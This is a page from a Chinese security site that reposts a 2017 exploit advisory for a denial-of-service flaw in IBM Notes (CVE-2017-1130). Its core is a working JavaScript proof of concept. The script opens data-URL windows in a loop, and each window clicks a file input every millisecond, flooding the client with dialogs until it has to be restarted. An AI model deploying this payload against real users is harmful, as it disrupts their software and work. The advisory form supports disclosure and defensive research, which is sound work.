首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM Notes 8.5.x/9.0.x - Denial of Service (2)
来源:http://datarift.blogspot.in/ 作者:Mishra 发布时间:2017-09-05  
# Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
# Exploit Author: Dhiraj Mishra
# Contact: http://twitter.com/mishradhiraj_
# Website: http://datarift.blogspot.in/
# CVE: CVE-2017-1130
# Category:  IBM Notes (Console Application)
 
 
1. Description
 
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.
 
2. Proof of concept
 
<script>
var w;
var wins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
    for (var k in wins) {
        // after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
        if (wins[k] && wins[k].status === undefined) {
            wins[k].close();
            delete wins[k];
        }
    }
    w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
    if (w) {
        wins[i] = w;
        i++;
    }
}, 1);
</script>
 
 
3. IBM Security Bulletin
 
http://www-01.ibm.com/support/docview.wss?uid=swg21999384
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·libgedit.a 3.22.1 Denial Of Se
·Dup Scout Enterprise 9.9.14 -
·USB Safely Remove 5.5.5 Denial
·NEC EXPRESS CLUSTER clpwebmc R
·IBM Notes 8.5.x/9.0.x - Denial
·Mongoose Web Server 6.5 - Cros
·Jungo DriverWizard WinDriver -
·Malicious Git HTTP Server For
·Jungo DriverWizard WinDriver -
·VX Search Enterprise 10.0.14 B
·Tor - Linux Sandbox Breakout v
·Easy Vedio to PSP Converter 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved